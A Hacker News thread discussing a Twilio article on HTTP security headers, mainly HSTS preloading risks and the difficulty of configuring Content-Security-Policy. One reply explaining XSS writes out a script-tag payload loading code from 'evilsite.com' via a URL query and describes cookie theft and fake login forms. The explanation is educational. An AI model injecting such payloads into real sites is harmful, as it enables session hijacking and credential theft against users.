Hacker News new | past | comments | ask | show | jobs | submit login
HTTP headers for the responsible developer (twilio.com)
887 points by kiyanwang 12 days ago | hide | past | web | favorite | 98 comments





I have been trying to explain the importance of HTTP headers to some younger/junior devs I am working with. I have noticed that headers are often considered to be 'too technical' or even 'old tech'.

I'm going to recommend them to read this, but I do think I need to explain a couple of things that the article is not clear about:

- Be sure that you understand the concept of HSTS! Simply copy/pasting the example from this article will completely break subdomains that are not HTTPS enabled and preloading will break it permanently. I wish the authors made that more clear. Don't use includesubdomains and preload unless you know what you are doing. Scott Helme also did a great article about this [0].

- CSP can be really hard to set up. For instance: if you include google analytics, you need to set a script-src and a img-src. The article does a good job of explaining you should use CSP monitoring (I recommend sentry), but it doesn't explain how deceptive it can be. You'll get tons of reports of CSP exceptions caused by browsers plugins that attempt to inject CSS or JS. You must learn to distinguish which errors you can fix, and which are out of your control.

- Modern popular frontend frameworks will be broken by CSP as they rely heavily on injecting CSS (a concept known as JSS or 'styled components'). As these techniques are often adopted by less experienced devs, you'll see many 'solutions' on StackOverflow and Github that you should set unsafe-inline in your CSP. This is bad advise as it will bascially disable CSP! I have attempted to raise awareness in the past but I always got the 'you're holding it wrong' reply (even on HN). The real solution is that your build system should separate the CSS from JS during build time. Not many popular build systems (such as create-react-app) support this.

- Cache control can be really hard too. If you don't have time to fiddle with these settings, I recommend using a host like Netlify, they seem to do a proper job at caching in my experience.

[0] https://scotthelme.co.uk/tag/hsts-preload/

edit: typos


> - Be sure that you understand the concept of HSTS! Simply copy/pasting the example from this article will completely break subdomains that are not HTTPS enabled and preloading will break it permanently. I wish the authors made that more clear. Don't use includesubdomains and preload unless you know what you are doing. Scott Helme also did a great article about this.

Great point that is even more important than people might realize at first when reading your comment, because it doesn't cover only your web properties; it covers all subdomains even those you forget you use and don't associate with your web presence.

You have a nas at nas.exemple.com, a webmail at mail.exemple.com, a third party cdn/similar routing at cdn.exemple.com, a printer interface at printer.office.exemple.com and other internals things at internally routed path, like that custom old dashboard written 15 years ago ? Include subdomain covers it, and preloading means you can't disable it once you realize you shouldn't have done it.

Seen a few small non-IT companies hit by that, and then asking for urgent consultancy to fix it.


> and then asking for urgent consultancy to fix it.

If it is preloaded (as the article suggest you should do), there is nothing you can do to 'fix' it, except migrating all other subdomains to HTTPS. Which is not always possible.


Oh yes exactly, especially since they don't have much planned budget for it (small firms) it ends either with a lot of dirty proxying to have an HTTPS middle point, just because someone screwed up without paying attention to what they were actually doing, or with a secondary domain for the office.

My subdomains for things like that all go through a reverse-proxy (Caddy) where I terminate HTTPS, which makes things simple, though I still don't use includesubdomains because it just seems too risky.

One tip from personal experience: I usually introduce CORS (and Access-Control-Allow-Origin header in particular) first. Most people unfamiliar with HTTP headers have no problem understanding the usefulness of that one and it opens the door to other stuff.

I'm surprised that SRI (sub resource integrity) isn't mentioned, though it does require HTML changes. It makes you embed SHA-2 hashes into your CSS and/or JS tags, and if the given hash doesn't match the received resource's hash, the resource isn't applied to the page. It protects you (for example) from your CDN changing your data.

Also, no mention of E-tags. They help with caching.


> Be sure that you understand the concept of HSTS! Simply copy/pasting the example from this article will completely break subdomains that are not HTTPS enabled and preloading will break it permanently

+1. I'm kind of worried that the default copy-pasteable snippet there can lead to serious consequences. Well, less today when you can get certs for free, but you may have some unpleasent downtime.


> The real solution is that your build system should separate the CSS from JS during build time. Not many popular build systems (such as create-react-app) support this.

The real solution is to fix the actual protocol issues, instead of imposing arbitrary limitations on what scripts can do with the page. If you pause and think about what these security measures are aiming to mitigate, they themselves are at best amateurish.


They aren't strictly "protocol issues" though, they're just dangerous features that are good to be limited in most cases.

It could be that headers seem scary, and I think that is because you can get a lot done without them, so they might be unfamiliar to junior devs. To make them less scary maybe it is sufficient to say they are just key/value pairs, like an additional JSON object in the response. It's there for you to see in Chrome dev tools, and it's fun seeing how different sites might send different headers.

As a motivator I always say look at the network tab and think about how you can make stuff faster. It was this mindset where I first saw these additional requests and thought 'WTF!' I better find out why it is happening, turned out to be preflight requests.


> I think that is because you can get a lot done without them

Reinventing the wheel is also a good way to fool yourself into assuming we're being clever and productive. I mean, it's as if everyone who preceded me in a field was incapable of looking into a problem I've managed to find a hacky solution in 5 minutes.

Meanwhile let's not pretend that there are currently about half dozen standards and specifications for HATEOAS, all involving ugly hacks around response documents and funny media types, when all it takes to achieve the same goal is passing link relations through Link headers.


How can you even get a job as a junior dev without knowing about headers?

Never been asked about headers in a job interview, junior or otherwise. Usually interviews are a 'can you code' test. I've never been interviewed by FAANG etc. though.

Easy, you just think you have to add a content type.

I was also disappointed that some aspects of modern JS frameworks make adding strict CSPs incredibly hard. Especially with CSS there don't seem to be many resources on how to make something like React styled components work with CSPs, disabling the CSS CSP seems to be the only reasonable way to do this.

> Modern popular frontend frameworks will be broken by CSP as they rely heavily on injecting CSS (a concept known as JSS or 'styled components')...

Not sure what you mean by this paragraph. JSS and styled components are both specific JS libraries that provide a way to write styles in JS and compile them to normal CSS. They both support normal server-side rendering of CSS that could be included in the HTML like any traditional web page.

The general term for this concept is “CSS-in-JS.” The libraries do not rely on inline styles, even though the general term may suggest that.

I’m not very familiar with JSS, but styled components absolutely supports building CSS in create-react-app.


I confused styled components with JSS. JSS is a library used by popular UX libraries, most notably Material-UI.

The problem is that JSS injects the CSS dynamically at runtime. There seems to be no real solution to extract the CSS into a .css file at compile time.

The only solution that the JSS developers suggest [0] is using server-side rendering to inject a nonce into the HTML script tag to bypass CSP. But I think that requiring server-side rendering for a client-side rendered framework is totally backwards. The whole reason why I use single page client side rendered applications is so I can deploy on a CDN.

[0] https://github.com/cssinjs/jss/blob/master/docs/csp.md


Another gotcha with HSTS + includesubdomains is if you have a naked domain e.g. https://example.com redirecting to a www prefix e.g. https://www.example.com, but the server is configured to send the HSTS header for the naked domain.

It's not always obvious because your gut reaction is "oh my web site is on www.", but that misconfigured naked domain redirect might indeed break "randomservice.example.com".


Unfortunately, using Google Tag Manager basically requires setting 'unsafe-inline', neutering your CSP.

Are you implying that CSS-in-JS is an anti-pattern, due to its incompatibility with CSP? (I have no opinion one way or the other regarding CSS-in-JS).

> I have noticed that headers are often considered to be 'too technical' or even 'old tech'.

Are you or they able to elaborate on that? Headers are an active area of research/implementation for web security, are they working on any replacement to the entire concept?


> Be sure that you understand the concept of HSTS!

Instead of using HSTS, you can also simply redirect any HTTP request to HTTPS. That way, you are certain that HTTPS is used, even if a browser does not understand HSTS.


The limitation with the approach (of HTTP=>HTTPS redirects) is that your average coffee-shop-wifi-user may not notice if their connection does not upgrade to HTTPS due to malicious interception of their connections.

With HSTS, once they've connected to the server over HTTPS once (e.g. at home), every connection from that browser will be immediately upgraded to HTTPS before even trying HTTP.

Your suggestion is valid - as HSTS is only delivered over HTTPS - and the upgrade is still required the first time.

See Firesheep for an example of how HTTP can be intercepted - https://en.wikipedia.org/wiki/Firesheep


This will leave your users vulnerable to man-in-the-middle attacks. If I control the router between their computer and the Internet, I can serve back a HTTP page which doesn't redirect, and trick them to enter their password (for example).

HSTS is designed to prevent this.


How can HSTS prevent a man in the middle attack if the server has not even been contacted yet?

It can't, that is what preloading is for. Your browsers comes preloaded with a list of all sites that have requested HSTS preload, so your browser will use HTTPS even on the first visit. This is why preloading on all subdomains is potentially dangerous to use, it could break your site if you don't have HTTPS everywhere.

But even without preloading HSTS will improve security. Yes, the first visit will be susceptible to MITM, but every visit after that is not. This makes it a lot more difficult for an attacker as they must intercept the very first visit for the attack to work.



It can only do that if you add it to the preload lists of browsers (which is mentioned in the article).

But even if it is not, it's still helpful for people connecting to your site again.


And because the preload list is hierarchical whole swathes of the Web can be covered with a single entry. .dev is the biggest example, but they can protect all the stack exchanges, all the default blogspot blogs, that sort of thing.

It can't! But after the first time it's been contacted, when you contact it again HSTS will enforce HTTPS (from the client itself - much stronger than a redirect).

> Instead of using HSTS, you can also simply redirect any HTTP request to HTTPS

I think this comment sums up my whole point about how less experienced developers must learn how to use headers.

Like others have commented, HSTS is used to fix potential dangers in forwarding (MITM attacks), it also reduces overhead.

> That way, you are certain that HTTPS is used, even if a browser does not understand HSTS.

If you use HSTS, you should always use a 301 permanent redirect as a fallback method for old browsers and other HTTP clients (like some libCurl implementations).


I think what this comment thread really says is that the burden of fixing mistakes in the web's fundamental design is put on the individual developer and that this is another mistake!

If MITM is a serious issue then it's an extremely bad idea to depend on individual developers of every website out there to mitigate this.


Everything else is just wishful thinking, though. Chrome cannot decide to just deprecate (e.g.) unsafe-inline CSS tags. It would break 90% of websites, and people would move to a different browser to get their websites to work.

Yeah but than you always generate an additional request, with HSTS cached, browser with fetch the https version without an additonal redirect. I wrote a post about it some time ago https://pawelurbanek.com/amp-seo-rating-performance

And break legacy browsers and stupidly implemented corporate proxies and firewalls as well.

Bonus if your URLs get rewritten by something client side which is what HSTS is supposed to protect from and redirect does not.


To me this just seems like more duct tape over the fact that everything on the web is doing things it wasn't really designed to do. We never could have imagined what we would be able to do with HTML/CSS/JS in a browser environment. We also never could have imagined how the pressure of business demands would essentially drive more and more duct tape solutions until the whole web was built on rickety scaffolding all sort of lashed together and swaying.

There are backend bandaids and frontend bandaids but with the sheer amount of stack knowledge and framework knowledge required to do anything as a webdev these days, there's no way to stay on top of it all and we are just kinda winging some combination of best practices and getting shit done.

I don't know if things like PWAs and WASM is going to allow us to move towards a change yet, and would love input form someone with an opinion.


> the sheer amount of stack knowledge and framework knowledge required to do anything as a webdev these days

I think this is greatly exaggerated. You can get by just fine making your own sites knowing some basic html/css/maybe js, maybe some php too if you want backend stuff. Optionally some frameworks if you want, which should usually be easy enough to just follow some examples and get the functionality you want pretty fast.

If you're put on an existing web project, you probably only have to learn the bits immediately surrounding the things you do, picking it up as you go along. I still don't know Angular, React, Vue, or much else in the way of JS frameworks other than jQuery after being in web dev professionally for years, as it simply hasn't been needed.


Yeah, sorry if I wasn't clear, but that's kind-of my point. You can make a site by knowing how to use some subset of stuff, but the rest you use as a black box - whether it is importing a bunch of third party libraries or being able to build a web app without understanding how cross-site attacks work, etc etc so at some point you either have to learn these little gotchyas all over the place or they go un-fixed.

Like how many sites still don't have mandatory HTTPS even though it is free and easy?


That's no different from programming in any other environment then - good libraries are generally meant to work like black boxes and security issues etc happen everywhere.

As a full-stack dev I recently locked down my security headers and I have a new perspective on what a web browser actually is. Before I saw all web-browsers as just a window that renders web content and enables user interaction.

Now, I see that I can have a conversation with the browser at a different level. Headers allow me to dictate the intricate details of how this hardened security tool (the browser) will interact with my code.

HTTP headers do appear to be a duct tape solution, however, once you implement them and understand what is going on; your hindsight will be 20/20 and you'll probably see them differently.

From what I understand WebAssembly doesn't have anything to do with this issue. HTTP Headers are a contract between the server and client about what can happen on a webpage. WebAssembly is a programming language and virtual machine that executes code. WASM code executing inside a VM would still need HTTP headers defining permissions for its actions.


I do understand headers, I also know how easy it can be to overlook a header setting or, most probably, work around a header to enable some piece of functionality because implementing the totally correct way is too time-consuming and expensive for the client. Etc etc etc.

My point isn't that we shouldn't learn about headers and how thy can be used to help facilitate security, we should! My point is that largely we are trying to patch an insecure system with many different points of insecurity as we allow browsers and servers to do more and more things and need to think about this as a structural problem of web development, not a problem of a dev not understanding enough to set the right headers.


> because implementing the totally correct way is too time-consuming and expensive for the client

There's your problem!

> think about this as a structural problem of web development, not a problem of a dev not understanding enough

No, go back to your root cause and fix that.

From my research I've found that clients/managers only allow a development team to finish 15% of a feature before they consider it ready for production and demand a deployment. They don't understand security, testing, documentation, or hardening. Developers only have so much energy to roll these boulders uphill so eventually the crazy business people win. Today if you put a server on the internet you will be attacked within 20 seconds, and that will continue forever. If you start a business you have a 50% chance of being hacked. This really isn't an issue with the tools available, it's the developer effort and toxic work environment dubbed "Agile".


Gotta love all the ritual incantations one has to perform to "keep your website safe" these days. Worst of all, people are clearly bragging about possessing this arcane knowledge, instead of constantly complaining about how stupid the whole thing is to begin with. "Responsible developer"? Hah.

The web needs a real security model relevant to what browsers are doing today, not these piecemeal hacks ducktaped to a hypertext delivery protocol.


As someone who builds websites for money, I couldn't agree more. I rarely get to bill for making incremental changes, I get to bill for implementing features. Spending money to implement and log a properly restrictive Content-Security-Policy doesn't seem like wise use of my clients limited budget.

It may be a wise use if a security break-in would be a problem for your client.

I am a big fan of restrictive CSP, but it's often hard to get there from an existing site. It's often better to do it in stages, e.g., when you work on page Q, you make that page have a restrictive CSP. Later, when you work on page R, that can grow one (or at least have fewer CSP issues). If having someone break into your site would be a serious problem, then you should speed up what it takes to get there.


Great article.

Somebody else mentioned Scott Helme, but didn't link to three of his amazing sites:

https://securityheaders.com which checks important headers

https://report-uri.com/ which allows sending CSP reports to to catch errors. It also has a CSP builder (among a bunch of tools) which is hugely helpful: https://report-uri.com/home/generate

https://scotthelme.co.uk/ is his blog with a ton of info. It also has a cheat sheet for CSP: https://scotthelme.co.uk/csp-cheat-sheet/

(I might be a fan of the guy ha)


These are great features, but I wish there were better ways to communicate the security policies for my website than having to send lengthy headers with every page.

CSP in particular tends to get rather long-winded. As the article says, it can contain up to 24 policies, many of which contain their own lists! It's bound to get even more complicated as web apps integrate with an ever greater number of external services. Feature-Policy also looks like it could easily balloon to 1KB or more if you wanted to control all the features. No matter how much compression you add, at some point this is going to affect the load time. Additional TCP round trips aren't cheap, especially for HTML resources that usually aren't cached at the edge.

Wouldn't it be convenient if I could store a structured representation (JSON, YAML, whatever) at a predefined location under /.well-known/ and use ordinary Cache-Control headers to make browsers cache the rules?


> Feature-Policy also looks like it could easily balloon to 1KB or more

Twitter sends over 6kb of CSP headers on every single request. This is what happens if you run loads of different advertisement and tracking vendors.


> Twitter sends over 6kb of CSP headers on every single request.

Now I understand why HTTP/2 uses compression for HTTP headers.


If you're implementing CSP, you should only include the header on text/html or other rendered responses, so the overhead is more per-navigation than per-request. I've seen a lot of guides where CSP is added globally at the webserver level which can waste a lot of bandwidth with images etc.

With HTTP/2, HPACK can ensure the CSP or Feature-Policy header only ever gets transmitted _once_ as long as the header doesn't change between responses. A one-time cost of 1KB is almost nothing, even for relatively slow mobile connections.

Yeah, I really do not like how CSP is implemented. It is hard to configure correctly and bloats all HTTP responses.

I read the whole article just to find out what the X-Shenanigans header shown in the picture at the top of the article is. There was no further mention of it.

Looks like it's an inside joke from Twilio[0].

[0] https://github.com/kwhinnery/todomvc-plusplus/issues/7


Aren't advertising networks blocking the adoption of CSP headers? Seems like it's quite a job to maintain the exceptions needed for Doubleclick for example.

It is always quite a job to maintain CSP. And it's really easy to break something with CSP.

This is why loads of devs usually throw in the towel and disable CSP or use a unsafe-line. Basically like trying to solve a hard CSS problem and at some point give up and add !important statements everywhere.

It's also really, really hard to explain to customers that it takes time to set up, and every time they install a new tracking/ad/video/whatever plugin on their CMS, you'll have to spend time on adjusting the CSP accordingly.

That said, I do encourage developers to use CSP. It's a really powerful tool to secure your site and protect your visitors from fraud/phishing.


It is also at least some level of defense against malicious npm packages (doesn't eliminate threat completely, but at least less sophisticated attacks will be thwarted).

CSP headers are a very useful tool and I encourage everyone to use them. They are a PITA to set up though. Fortunately at least Firefox clearly communicates in console log when a CSP rule is hit, and how to relax it (if it was by mistake).

Note that CSP can be set as META tags too. There's a gotcha though: if they are set in both places (HTTP headers and HTML META tags), an intersection of the rules is used.


Developers connect people. Developers help people. Developers enable people.

Look I understand that people in general feel the need to pretend that their work is very important and good but come on. You are not working for Warchild in a Lebanese refugee camp.


  Developers connect people. 
  Developers help people. 
  Developers enable people.
I don't remember agreeing to these conditions. Is this some sort of psychological manoeuvre to get people to use SSL encryption on the web ?

Whilst, if you ever upset one badly enough, you will find that sysadmins disable people.

I signed up for the building cool shit part, which seems to be omitted.

One of the perks was that it was something you could do mostly by yourself, without dealing with the messy and irritating mass of humanity.


When dealing with user uploads, we still need content disposition headers to force browsers to treat certain formats as attachments, rather than showing them inline, right?

I kind of understand why CSP isn't more widespread.

I tried adopting CSPs on all my sites to full Mozilla Observatory[0] standard. One is a Go based Heroku instance, where I used unrolled/secure[1], though there are a few different packages achieving this. The others are static Netlify deploys using Netlify CMS. For those, you have to include a headers file (in my case I am instructing Hugo to build the site with a .headers media file included, which Netlify parses).

Some observations:

- It's a huge pain in the ass / trial and error process

- The formatting for CSP rules was evidently made to be as insufferable as imaginable. All on the same line, with commas and semicolons being the only separators, no line-breaks, tabs or anything allowed. Seriously, wtf

- When you think you've got it working, some other thing breaks in a weird, silent way

- Debugging CSPs in Firefox is nearly impossible (as for certain in-line scripts, you will need to get SHA values to tell the CSP to let them through. Chrome provides the SHA in the console. Firefox bizarrely doesn't.)

- Trying to integrate google recaptcha with CSP is hilariously complicated

- You should try to host all fonts yourself, lest you need to enable google or fontawesome exceptions for font, CSS, script and svg, because apparently that's what you need just to get an FB icon on your page to work

- Forget about React, or anything using inline-script or styles. Netlify CMS and the Netlify identity widget all require inline styles and scripts. Even generating SHA values for all of those, I could not get this stuff to work. In the end I gave up and disabled the CSP again

And this is for static sites using really simple tooling. I have yet to find a viable way to make this work.

edit (some additional notes):

- Tools like this one[2] did not generate SHA values that were accepted by the CSP. I have tried a few different tools, checked all white spaces over and over. I just couldn't get it to work. Only Chrome returned the proper SHA value.

- I tried fixing a hover state loading in improperly (it flickered on first hover). This wasn't related to the CSP, but because I had to try lots of different things, like load in an SVG sprite, or png sprite, try pre-loading, use some JS, etc. etc. I had to keep changing the CSP to work with this, too. So applying a CSP should only be done at the end of a project. At the same time, if anything breaks from one day to the next, your debugging will now include the CSP as well most likely.

---

[0]https://observatory.mozilla.org/

[1]https://github.com/unrolled/secure

[2]https://passwordsgenerator.net/sha256-hash-generator/


> All on the same line, with commas and semicolons being the only separators, no line-breaks, tabs or anything allowed.

That's the format for HTTP headers. They could push against the standard and accept spaces, but anything else would break your browser.


That's fair enough, and admittedly I wasn't aware of this.

Presumably that format was fine before bigger / more complex CSP rules came along?

I find it very difficult to work with visually. Hard to see where one thing stops and another starts.


The format was clearly not created for large things like CSP rules.

If it was up to me, I would have placed the information at the linking tags inside the HTML (and JS, and CSS), or even extended the HTTP URI format in some way. There is probably a very good reason why people decided for the header, but I'm not aware of it.


If something is so hard to use that nobody can be arsed to do it properly, it's generally a signal that the tool needs to be redesigned.

CSP could be better, but it's perfectly useful as it is. The problem is that too many people did things badly (using inline JavaScript), mixing up code and data. It's time-consuming to fix problems like that, but possible. Enabling CSP is easy... it's fixing your system so it works with it that takes time.

The CII Best Practices Badge uses restrictive CSP. You can tell that here: https://securityheaders.com/?q=bestpractices.coreinfrastruct...


I'm not sure redesigning this would help because it's just a mechanism to define an ACL. Yes, it's hard to implement correctly and maintain, but that's because of the wild number of external dependencies developers toss into modern webpages. Start with basic HTML and your header just looks like this: Content-Security-Policy: default-src 'self'

Google.com gets a D+ on Mozilla Observatory.

For sites like Google, this is either a calculated risk, or not even applicable for them.

Scanner services like Mozilla Observatory / securityheaders.io / Qualys / etc only test a preset list of known best practices, they can't judge whether that technique is applicable for that site.

While it's usually good practice to follow the recommendations of such scanning services, you must always make sure you understand the implications.


Haha, yup, that's one of the tests I did as well. Most sites score terribly. Honestly, I was just experimenting (and for my static sites this doesn't really matter so much), yet it feels like there are a lot of issues with CSP that really don't need to be there. Until then, adoption will probably be slow / non-existent.

You can check your site's usage of most of these headers with https://securityheaders.com. HSTS and more is checked by https://www.ssllabs.com/ssltest/. Definitely make sure you understand what the headers do before changing them. Don't just copy/paste what you see here.

This is how you can get the headers:

    curl -I -X GET \
        https://www.twilio.com/blog/a-http-headers-for-the-responsible-developer

You can see them in your browser's dev tools as well

I was curious why you added the `-X GET` to that, but it seems twilio returns 405 Method Not Allowed for HEAD requests. Is there any legitimate reason they would block these?

HEAD worked for me.

"-X GET" is superfluous, as that is the default method.

Unless you use "-I", as in the example, in which case the default method is HEAD.

D'oh! I'll let the record stand as lesson on rash comments.

"Browser support for CSP is good these days, but unfortunately, not many sites are using it....I think we can do better to make the web a safer place"

Interestingly enough the blog this was posted on falls into the 94% not taking the effort to use CSP!


CSP interacts in a surprising way (at least it was to me) with service workers.

https://qubyte.codes/blog/content-security-policy-and-servic...


I'm curious why/how XSS is a problem. Can someone describe a practical example of how this has been successfully abused? To me XSS allows a page to be distributed over many servers and that's more of a feature than a threat!

A very simple example could be a website that takes unsanitized forum posts. Include a link to a malicious script in your post, and anyone who visits that page loads the script.

For another example, you could imagine a page on a website that includes the contents of a URL query in the response. For example, you visit www.goodsite.com/search.php?q=PurpleZebra, and the page displays "Your search for PurpleZebra did not return any results."

Now in the URL replace "PurpleZebra" with "<script src='evilsite.com/script.js'>" and trick someone into clicking on that link - now the error page delivered by goodsite.com includes the script from evilsite.com.


Google made a game that explains it well https://xss-game.appspot.com

There are actually two different types of CSS, there's a persistent version which loads any time any user loads a certain page, and there's a reflected version which only shows up when a user clicks a mal-crafted link. The persistent version is the most dangerous, as it doesn't rely on the user being incredibly stupid. The reflected version is by far the most common, but since it requires the user to click on a malicious link, isn't usually the easiest to exploit.

But either way, they both allow an attacker to display information on a website, when the content didn't originate from that site.

An example of how this could be really bad, would be a script that deletes all of the content from the document body and replaces it with a login screen. Rather than actually logging you in, it submits the username and password you entered to a site the attacker has control over.

Another, less obvious method, would be a script that captures your session cookie and submits that to another site the attacker has control over. If you were logged in to the site, the attacker could use the session cookie to authenticate to the site as you without logging in.


Ok, in that case I don't see how headers solve the problem better than:

1) Don't click on bad URLs. (should be taught at kinder-garden by now)

2) Replace all input <> with &lt;&gt; etc.

I'm convinced scripts should not be able to read cookies for other domains?

Surely I'm missing something?


The Content-Security-Policy header prevents any new JavaScript from getting executed. Any inline scripts have to have a matching nonce, or SHA hash in the CSP header. With XSS, an attacker can insert content into the web page, but they can't modify the headers, so this effectively stops all XSS without some additional vulnerability being exploited.


"XSS" usually refers to the vulnerability that happens when user input is treated as HTML and shown on a site in a way that allows the user to inject javascript, not the general practice of a site author intentionally adding a <script> tag pointing to a script on another domain.

Maybe you are confusing this with RSS?

> Did you ever wonder why you can’t use local environments like my-site.dev via HTTP with your browser anymore? This internal record is the reason – .dev domains are automatically included in this list since it became a real top-level domain in February 2019.

.dev hasn't been working locally for me for more than a year.


I use "foo.local" as a drop-in replacement, haven't had problems...

Apparently “.test” is the RFC official one to use. Jts recently got around to fixing all my local projects https://en.wikipedia.org/wiki/.test

Any devices using mDNS might disagree.

Sure; tho I only said _I_ haven't had problems using ".local". In any case, I think your peer commenter who replied about use of '.test' "wins", though, given the RFC.

thx, my future headers cheat sheet.

thanks :)



Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: